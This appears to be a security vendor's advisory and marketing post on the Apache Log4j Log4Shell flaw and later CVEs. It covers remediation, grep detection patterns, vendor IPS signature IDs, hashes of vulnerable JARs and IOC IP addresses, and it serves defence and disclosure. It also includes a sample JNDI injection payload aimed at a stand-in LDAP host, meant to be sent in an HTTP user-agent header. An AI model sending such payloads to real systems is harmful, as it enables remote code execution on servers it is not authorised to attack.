Simulating and Preventing CVE-2021-44228 Apache Log4j RCE Exploits

The Blue Report 2024

Get a comprehensive analysis of over 136 million cyber attacks and understand the state of threat exposure management.

DOWNLOAD

Picus Labs has updated the Picus Threat Library with attacks that exploit CVE-2021-44228 Remote Code Execution (RCE) vulnerability affecting Apache Log4j - the ubiquitous Java logging library.

What is the CVE-2021-44228 Log4j Unauthenticated RCE Vulnerability?

Apache Log4j versions prior to 2.15.0 do not protect against attacker-controlled LDAP and other JNDI-related endpoints. When message lookup substitution is enabled, an attacker with control over log messages or log message parameters can execute arbitrary code loaded from LDAP servers. This vulnerability is also dubbed Log4Shell or LogJam.

Test your security controls now: Prevent Log4Shell Exploits with Picus

The CVE-2021-44228 is a remote code execution vulnerability that can be exploited without authentication. Therefore, CVE-2021-44228 is an unauthenticated RCE vulnerability affecting Apache Log4j versions before 2.15.0.

Log4j Vulnerability Updates (CVE-2021-44832, CVE-2021-45105, CVE-2021-45046)

Update (December 28, 2021): A new vulnerability (CVE-2021-44832) is found in Apache Log4j2 versions 2.0-beta7 through 2.17.0. CVE-2021-44832 is an Arbitrary Code Execution vulnerability. Since it can be exploited by an attacker with permission to modify the logging configuration, its severity is lower than Log4Shell (CVE-2021-44228). Its base CVSS score is 6.6 (medium). This vulnerability is fixed in Log4j versions 2.17.1 (Java 8), 2.12.4 (Java 7) and 2.3.2 (Java 6).

Update (December 16, 2021): Since we published this blog post, 2 new vulnerabilities have been discovered.

Apache Log4j versions prior to 2.16.0 are vulnerable to information leaks and remote/local code execution (CVE-2021-45046) flaw. It was first discovered as a denial of service vulnerability. However, later found out that it is also a remote/local code execution vulnerability, which increases its CVSS score from 3.7 (low) to 9.0 (critical).

CVE-2021-45105 is another vulnerability found in Apache Log4j versions prior to 2.17.0. It is a denial of service vulnerability with a CVSS score of 7.5 (high). Similar to CVE-2021-45046, malicious recursive lookup sent via Thread Context Map (MDC) input causes StackOverflowError in this vulnerability.

image (57)

To See the Full Infographic, Click Here

What is the Impact of the Log4j RCE Vulnerability? 

CVE-2021-44228 vulnerability enables remote code executions on systems running vulnerable Log4j versions and allows the attacker full control of the affected server.  For example, attackers can exploit CVE-2021-44228 to run malicious codes and install webshells as backdoors on vulnerable systems for maintaining access and post-exploitation.

CVE-2021-44228 is a vulnerability that affects the default configurations of several Apache frameworks, including Apache Struts2, Apache Solr, Apache Druid, and Apache Flink. Thus, it is a high-impact vulnerability affecting widely used software.

Update: CVE-2021-45046 vulnerability also enables remote code execution. However, the delivery of the payload is different from CVE-2021-44228 vulnerability. Exploiting this vulnerability requires control over Thread Context Map input data where the attacker needs to create a malicious payload using JNDI Lookup Pattern. When exploited, this vulnerability results in information leak and remote code execution in some environments and local code execution in all environments.

CVE-2021-45105 vulnerability enables denial of service (DoS) for Log4j versions prior to 2.17.0. Similar to CVE-2021-45046, attacker-controlled Thread Context Map input data can be leveraged to create uncontrolled recursion from self-referential lookups.

What is the Current Situation?

According to BadPackets and Cert NZ,  attackers are actively scanning the Internet for systems running vulnerable Log4j versions and exploiting CVE-2021-44228. This is an expected adversary behavior for a remotely exploitable and unauthenticated code execution vulnerability. 

Log4j Exploit

In order to exploit the Log4j vulnerability, the attacker must initiate the generation of a log entry containing a JNDI request. Thus, the Log4j exploit payload must be contained within logged errors such as exception traces, authentication failures, and other unexpected vectors of user-controlled input. Then, Log4j must process the exploit payload. 

The exploit payload can be sent in a header field of an HTTP request. Picus Labs researchers validated the following sample payload included in the user-agent header:

${jndi:ldap://example.com}

Note that you need to run a malicious LDAP server to exploit the CVE-2021-44228 vulnerability and modify the example.com part of the payload.

Update: According to the Microsoft Threat Intelligence Center, nation-state actors from various countries are already utilizing Log4j vulnerabilities for their benefit. However, it is not easy to determine where these attacks originate from because attackers are using TOR (The Onion Router) to stay anonymous.

From their TTPs (Tactics, Techniques and Procedures), it can be deduced that APTs like PHOSPORUS and HAFNIUM are mutating their ransomware using Log4j vulnerabilities. In the future, it is expected these vulnerabilities will be part of many ransomware attack campaigns.

What Should You Do for Remediation?

The CVE-2021-44228 Log4j RCE vulnerability was patched in Log4J v2.15.0  by Apache. Therefore, it is not a zero-day vulnerability. To protect against these attacks, we highly advise organizations to identify vulnerable systems on their networks and update vulnerable Log4j installations.

This vulnerability can also be mitigated in previous releases (>=2.10):

  • by setting the system property "log4j2.formatMsgNoLookups" to "true" 
  • by removing the JndiLookup class from the classpath (example command: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class). 

Java 8u121 protects against RCE by setting the properties "com.sun.jndi.rmi.object.trustURLCodebase" and "com.sun.jndi.cosnaming.object.trustURLCodebase" to "false."

Please keep in mind that Log4J v1 is no longer supported and will not receive patches to address this issue. Log4J v1 is also vulnerable to other RCE attacks, and we strongly advise you to upgrade to Log4J 2.15.0 as soon as possible.

Update: Due to new vulnerabilities found, Apache released Log4j version 2.17.0. This latest version remedies recently found CVE-2021-45046 and CVE-2021-45105 vulnerabilities.

How Can You Detect CVE-2021-44228 Vulnerability Exploitation Attempts?

Florian Roth, the Head of Research at Nextron Systems, has shared a set of YARA rules for detecting CVE-2021-44228 exploit attempts.

You can also utilize the following shell commands to search for exploitation attempts in uncompressed and compressed files respectively in the /var/log directory and all its subdirectories:

sudo egrep -i -r '\$\{jndi:(ldap[s]?|rmi)://[^\n]+' /var/log

sudo find /var/log -name \*.gz -print0 | xargs -0 zgrep -E -i '\$\{jndi:(ldap[s]?|rmi)://[^\n]+'

How Picus Helps Simulate and Prevent CVE-2021-44228 Exploits?

We strongly suggest simulating CVE-2021-44228 vulnerability to test the effectiveness of your security controls against Log4J attacks, determine gaps, and utilize prevention signatures to fill your security gaps using the Picus Security Control Validation Platform. 

Just click Start to see and try how you can simulate Log4j attacks and obtain prevention signatures using Picus with just a few clicks.

 

 

Test your security controls now: Prevent Log4Shell Exploits with Picus

 

Picus Threat Library includes the following threat for CVE-2021-44228 vulnerability. Moreover, it contains 1500+ vulnerability exploitation and endpoint attacks in addition to 11.000+ other threats as of today.

Threat ID

Action Name

Attack Module

21296

Apache Log4j Web Attack Campaign

Web Application

Picus also provides actionable mitigation content. Picus Mitigation Library includes prevention signatures to address CVE-2021-44228 Log4J RCE and other vulnerability exploitation attacks in preventive security controls. Currently validates signatures are given below:

 

Security Control

Signature IDs

Signature Name

Forcepoint NGFW

 

Generic_CS-Log4j-Remote-Code-Execution

Forcepoint NGFW

 

HTTP_CS_Log4j-Remote-Code-Execution

Palo Alto Networks NGFW

91991, 91994, 92001

Apache Log4j Remote Code Execution Vulnerability

Check Point NGFW

asm_dynamic_prop_CVE_2021_44228

Apache Log4j Remote Code Execution (CVE-2021-44228)

FortiGate NGFW

51006

Apache.Log4j.Error.Log.Remote.Code.Execution

Snort IPS

2034655

ET EXPLOIT Apache log4j RCE Attempt (http dns) (CVE-2021-44228)

Snort IPS

2034647

ET EXPLOIT Apache log4j RCE Attempt (http ldap) (CVE-2021-44228)

Snort IPS

2034658

ET EXPLOIT Apache log4j RCE Attempt (http ldaps) (CVE-2021-44228)

Snort IPS

2034648

ET EXPLOIT Apache log4j RCE Attempt (http rmi) (CVE-2021-44228)

Snort IPS

2034654

ET EXPLOIT Apache log4j RCE Attempt (tcp dns) (CVE-2021-44228)

Snort IPS

2034668

ET EXPLOIT Apache log4j RCE Attempt (tcp iiop) (CVE-2021-44228)

Snort IPS

2034649

ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (CVE-2021-44228)

Snort IPS

2034657

ET EXPLOIT Apache log4j RCE Attempt (tcp ldaps) (CVE-2021-44228)

Snort IPS

2034650

ET EXPLOIT Apache log4j RCE Attempt (tcp rmi) (CVE-2021-44228)

Snort IPS

2034653

ET EXPLOIT Apache log4j RCE Attempt (udp dns) (CVE-2021-44228)

Snort IPS

2034667

ET EXPLOIT Apache log4j RCE Attempt (udp iiop) (CVE-2021-44228)

Snort IPS

2034651

ET EXPLOIT Apache log4j RCE Attempt (udp ldap) (CVE-2021-44228)

Snort IPS

2034656

ET EXPLOIT Apache log4j RCE Attempt (udp ldaps) (CVE-2021-44228)

Snort IPS

2034652

ET EXPLOIT Apache log4j RCE Attempt (udp rmi) (CVE-2021-44228)

Snort IPS

2034659

ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP Bypass (CVE-2021-44228)

Snort IPS

2034659

ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP Bypass M1 (CVE-2021-44228)

Snort IPS

2034660

ET EXPLOIT Apache log4j RCE Attempt - lower/upper UDP Bypass (CVE-2021-44228)

Snort IPS

2034673

ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed M2 (CVE-2021-44228)

Snort IPS

2034661, 2034662

ET INFO Possible Apache log4j RCE Attempt - Any Protocol (CVE-2021-44228)

Snort IPS

2034665, 2034666

ET INFO Possible Apache log4j RCE Attempt - Any Protocol lower Bypass (CVE-2021-44228)

Snort IPS

2034663, 2034664

ET INFO Possible Apache log4j RCE Attempt - Any Protocol upper Bypass (CVE-2021-44228)

Snort IPS

58723, 58724, 58725, 58726, 58727, 58728, 58729, 58730, 58731, 58732, 58733, 58722, 58725, 58737, 58738, 58739, 58744

SERVER-OTHER Apache Log4j logging remote code execution attempt

F5 BIG-IP ASM

200104772

JNDI Injection Attempt (Content)

F5 BIG-IP ASM

200104769

JNDI Injection Attempt (Header)

F5 BIG-IP ASM

200104768

JNDI Injection Attempt (Parameter)

F5 BIG-IP ASM

200104723

JNDI Injection Attempt (ldap) (Header)

F5 BIG-IP ASM

200104725

JNDI Injection Attempt (rmi) (Header)

F5 BIG-IP ASM

200004451

JSP Expression Language Expression Injection (2) (Header)

F5 BIG-IP ASM

200004450

JSP Expression Language Expression Injection (2) (Parameter)

F5 BIG-IP ASM

200104773

JSP Expression Language Expression Injection (3) (Content)

F5 BIG-IP ASM

200104771

JSP Expression Language Expression Injection (3) (Header)

F5 BIG-IP ASM

200104770

JSP Expression Language Expression Injection (3) (Parameter)

F5 BIG-IP ASM

200004474

JSP Expression Language Expression Injection (3) (URI)

Cisco Firepower NGFW

58723, 58724, 58725, 58726, 58727, 58728, 58729, 58730, 58731, 58732, 58733, 58722, 58723, 58724, 58725, 58737, 58738, 58739, 58742, 58744

SERVER-OTHER Apache Log4j logging remote code execution attempt

Citrix Web App Firewall

999078

WEB-MISC Apache Log4j - Remote Code Execution Vulnerability via BODY (CVE-2021-44228)

Citrix Web App Firewall

999077

WEB-MISC Apache Log4j - Remote Code Execution Vulnerability via FORM (CVE-2021-44228)

Citrix Web App Firewall

999079

WEB-MISC Apache Log4j - Remote Code Execution Vulnerability via HEADER (CVE-2021-44228)

Citrix Web App Firewall

999080

WEB-MISC Apache Log4j - Remote Code Execution Vulnerability via URL (CVE-2021-44228)

Citrix Web App Firewall

999077

web-misc apache log4j - remote code execution vulnerability via form (cve-2021-44228)

Citrix Web App Firewall

999079

web-misc apache log4j - remote code execution vulnerability via header (cve-2021-44228)

FortiWeb Web Application Security

90490119, 90490120

Known Exploits

McAfee NSP

0x4529f700

HTTP: Apache Log4j2 Remote Code Execution Vulnerability (CVE-2021-44228)

ModSecurity

932100

Remote Command Execution: Unix Command Injection

ModSecurity

932130

Remote Command Execution: Unix Shell Expression Found

TippingPoint TPS

40627

HTTP: JNDI Injection in HTTP Request

We will update the above list when Picus Labs validate the signatures of other vendors/products.

Which Log4j  Versions are Vulnerable?

CVE-2021-44228 vulnerability affects Apache Log4j versions 2.0 to 2.14.1. SHA-256 hashes and default filenames of all vulnerable Log4j versions are given in the below table:

Filename SHA-256 Hash
./log4j-2.0-alpha1/log4j-core-2.0-alpha1.jar 006fc6623fbb961084243cfc327c885f3c57f2eba8ee05fbc4e93e5358778c85
./apache-log4j-2.0-alpha2-bin/log4j-core-2.0-alpha2.jar bf4f41403280c1b115650d470f9b260a5c9042c04d9bcc2a6ca504a66379b2d6
./apache-log4j-2.0-beta1-bin/log4j-core-2.0-beta1.jar 58e9f72081efff9bdaabd82e3b3efe5b1b9f1666cefe28f429ad7176a6d770ae
./apache-log4j-2.0-beta2-bin/log4j-core-2.0-beta2.jar ed285ad5ac6a8cf13461d6c2874fdcd3bf67002844831f66e21c2d0adda43fa4
./apache-log4j-2.0-beta3-bin/log4j-core-2.0-beta3.jar dbf88c623cc2ad99d82fa4c575fb105e2083465a47b84d64e2e1a63e183c274e
./apache-log4j-2.0-beta4-bin/log4j-core-2.0-beta4.jar a38ddff1e797adb39a08876932bc2538d771ff7db23885fb883fec526aff4fc8
./apache-log4j-2.0-beta5-bin/log4j-core-2.0-beta5.jar 7d86841489afd1097576a649094ae1efb79b3147cd162ba019861dfad4e9573b
./apache-log4j-2.0-beta6-bin/log4j-core-2.0-beta6.jar 4bfb0d5022dc499908da4597f3e19f9f64d3cc98ce756a2249c72179d3d75c47
./apache-log4j-2.0-beta7-bin/log4j-core-2.0-beta7.jar 473f15c04122dad810c919b2f3484d46560fd2dd4573f6695d387195816b02a6
./apache-log4j-2.0-beta8-bin/log4j-core-2.0-beta8.jar b3fae4f84d4303cdbad4696554b4e8d2381ad3faf6e0c3c8d2ce60a4388caa02
./apache-log4j-2.0-beta9-bin/log4j-core-2.0-beta9.jar dcde6033b205433d6e9855c93740f798951fa3a3f252035a768d9f356fde806d
./apache-log4j-2.0-bin/log4j-core-2.0.jar 85338f694c844c8b66d8a1b981bcf38627f95579209b2662182a009d849e1a4c
./apache-log4j-2.0-rc1-bin/log4j-core-2.0-rc1.jar db3906edad6009d1886ec1e2a198249b6d99820a3575f8ec80c6ce57f08d521a
./apache-log4j-2.0-rc2-bin/log4j-core-2.0-rc2.jar ec411a34fee49692f196e4dc0a905b25d0667825904862fdba153df5e53183e0
./apache-log4j-2.0.1-bin/log4j-core-2.0.1.jar a00a54e3fb8cb83fab38f8714f240ecc13ab9c492584aa571aec5fc71b48732d
./apache-log4j-2.0.2-bin/log4j-core-2.0.2.jar c584d1000591efa391386264e0d43ec35f4dbb146cad9390f73358d9c84ee78d
./apache-log4j-2.1-bin/log4j-core-2.1.jar 8bdb662843c1f4b120fb4c25a5636008085900cdf9947b1dadb9b672ea6134dc
./apache-log4j-2.2-bin/log4j-core-2.2.jar c830cde8f929c35dad42cbdb6b28447df69ceffe99937bf420d32424df4d076a
./apache-log4j-2.3-bin/log4j-core-2.3.jar 6ae3b0cb657e051f97835a6432c2b0f50a651b36b6d4af395bbe9060bb4ef4b2
./apache-log4j-2.4-bin/log4j-core-2.4.jar 535e19bf14d8c76ec00a7e8490287ca2e2597cae2de5b8f1f65eb81ef1c2a4c6
./apache-log4j-2.4.1-bin/log4j-core-2.4.1.jar 42de36e61d454afff5e50e6930961c85b55d681e23931efd248fd9b9b9297239
./apache-log4j-2.5-bin/log4j-core-2.5.jar 4f53e4d52efcccdc446017426c15001bb0fe444c7a6cdc9966f8741cf210d997
./apache-log4j-2.6-bin/log4j-core-2.6.jar df00277045338ceaa6f70a7b8eee178710b3ba51eac28c1142ec802157492de6
./apache-log4j-2.6.1-bin/log4j-core-2.6.1.jar 28433734bd9e3121e0a0b78238d5131837b9dbe26f1a930bc872bad44e68e44e
./apache-log4j-2.6.2-bin/log4j-core-2.6.2.jar cf65f0d33640f2cd0a0b06dd86a5c6353938ccb25f4ffd14116b4884181e0392
./apache-log4j-2.7-bin/log4j-core-2.7.jar 5bb84e110d5f18cee47021a024d358227612dd6dac7b97fa781f85c6ad3ccee4
./apache-log4j-2.8-bin/log4j-core-2.8.jar ccf02bb919e1a44b13b366ea1b203f98772650475f2a06e9fac4b3c957a7c3fa
./apache-log4j-2.8.1-bin/log4j-core-2.8.1.jar 815a73e20e90a413662eefe8594414684df3d5723edcd76070e1a5aee864616e
./apache-log4j-2.8.2-bin/log4j-core-2.8.2.jar 10ef331115cbbd18b5be3f3761e046523f9c95c103484082b18e67a7c36e570c
./apache-log4j-2.9.0-bin/log4j-core-2.9.0.jar dc815be299f81c180aa8d2924f1b015f2c46686e866bc410e72de75f7cd41aae
./apache-log4j-2.9.1-bin/log4j-core-2.9.1.jar 9275f5d57709e2204900d3dae2727f5932f85d3813ad31c9d351def03dd3d03d
./apache-log4j-2.10.0-bin/log4j-core-2.10.0.jar f35ccc9978797a895e5bee58fa8c3b7ad6d5ee55386e9e532f141ee8ed2e937d
./apache-log4j-2.11.0-bin/log4j-core-2.11.0.jar 5256517e6237b888c65c8691f29219b6658d800c23e81d5167c4a8bbd2a0daa3
./apache-log4j-2.11.1-bin/log4j-core-2.11.1.jar d4485176aea67cc85f5ccc45bb66166f8bfc715ae4a695f0d870a1f8d848cc3d
./apache-log4j-2.11.2-bin/log4j-core-2.11.2.jar 3fcc4c1f2f806acfc395144c98b8ba2a80fe1bf5e3ad3397588bbd2610a37100
./apache-log4j-2.12.0-bin/log4j-core-2.12.0.jar 057a48fe378586b6913d29b4b10162b4b5045277f1be66b7a01fb7e30bd05ef3
./apache-log4j-2.12.1-bin/log4j-core-2.12.1.jar 5dbd6bb2381bf54563ea15bc9fbb6d7094eaf7184e6975c50f8996f77bfc3f2c
./apache-log4j-2.13.0-bin/log4j-core-2.13.0.jar c39b0ea14e7766440c59e5ae5f48adee038d9b1c7a1375b376e966ca12c22cd3
./apache-log4j-2.13.1-bin/log4j-core-2.13.1.jar 6f38a25482d82cd118c4255f25b9d78d96821d22bab498cdce9cda7a563ca992
./apache-log4j-2.13.2-bin/log4j-core-2.13.2.jar 54962835992e303928aa909730ce3a50e311068c0960c708e82ab76701db5e6b
./apache-log4j-2.13.3-bin/log4j-core-2.13.3.jar e5e9b0f8d72f4e7b9022b7a83c673334d7967981191d2d98f9c57dc97b4caae1
./apache-log4j-2.14.0-bin/log4j-core-2.14.0.jar 68d793940c28ddff6670be703690dfdf9e77315970c42c4af40ca7261a8570fa
./apache-log4j-2.14.1-bin/log4j-core-2.14.1.jar 9da0f5ca7c8eab693d090ae759275b9db4ca5acdbcfe4a63d3871e0b17367463

Indicators of Compromise (IOCs)

It has been observed that the attached IP addresses are exploiting CVE-2021-44228 Log4j vulnerability. Although most of them are IP addresses of TOR exit nodes and blocking them may result in false positives, it is suggested to block these addresses in such critical cases.

18.27.197.252 171.25.193.25 185.220.101.34 185.220.101.158 204.8.156.142 164.90.199.216
23.129.64.131 171.25.193.77 185.220.101.35 185.220.101.161 205.185.117.149 167.99.164.201
23.129.64.141 171.25.193.78 185.220.101.36 185.220.101.163 209.127.17.242 167.99.172.58
23.129.64.146 178.62.79.49 185.220.101.42 185.220.101.168 209.141.41.103 167.99.172.213
23.129.64.148 181.214.39.2 185.220.101.43 185.220.101.169 45.153.160.131 185.220.100.241
45.12.134.108 185.38.175.132 185.220.101.45 185.220.101.172 45.153.160.138 185.220.101.37
45.155.205.233 185.83.214.69 185.220.101.46 185.220.101.175 62.76.41.46 185.220.101.41
46.166.139.111 185.100.87.41 185.220.101.49 185.220.101.177 68.183.44.143 185.220.101.57
46.182.21.248 185.100.87.202 185.220.101.54 185.220.101.179 68.183.198.247 185.220.101.134
51.15.43.205 185.107.47.171 185.220.101.55 185.220.101.180 88.80.20.86 185.220.101.144
51.255.106.85 185.129.61.1 185.220.101.56 185.220.101.181 109.70.100.34 185.220.101.154
54.173.99.121 185.220.100.240 185.220.101.61 185.220.101.182 109.237.96.124 185.220.101.160
62.102.148.69 185.220.100.242 185.220.101.129 185.220.101.185 116.24.67.213 185.220.101.171
72.223.168.73 185.220.100.243 185.220.101.138 185.220.101.189 134.122.34.28 185.220.101.186
81.17.18.60 185.220.100.244 185.220.101.139 185.220.101.191 137.184.102.82 185.220.102.249
104.244.72.115 185.220.100.245 185.220.101.141 185.220.102.8 137.184.106.119 188.166.48.55
104.244.74.57 185.220.100.246 185.220.101.142 185.220.102.242 142.93.34.250 188.166.92.228
104.244.74.211 185.220.100.247 185.220.101.143 193.31.24.154 143.198.32.72 188.166.122.43
104.244.76.170 185.220.100.248 185.220.101.145 193.189.100.203 143.198.45.117 193.189.100.195
107.189.1.160 185.220.100.249 185.220.101.147 193.218.118.231 147.182.167.165 193.218.118.183
107.189.1.178 185.220.100.252 185.220.101.148 194.48.199.78 147.182.169.254 195.19.192.26
107.189.12.135 185.220.100.253 185.220.101.149 195.176.3.24 147.182.219.9 212.193.57.225
107.189.14.98 185.220.100.254 185.220.101.153 195.254.135.76 151.115.60.113  
122.161.50.23 185.220.100.255 185.220.101.156 198.98.51.189 159.65.58.66  
171.25.193.20 185.220.101.33 185.220.101.157 199.195.250.77 159.65.155.208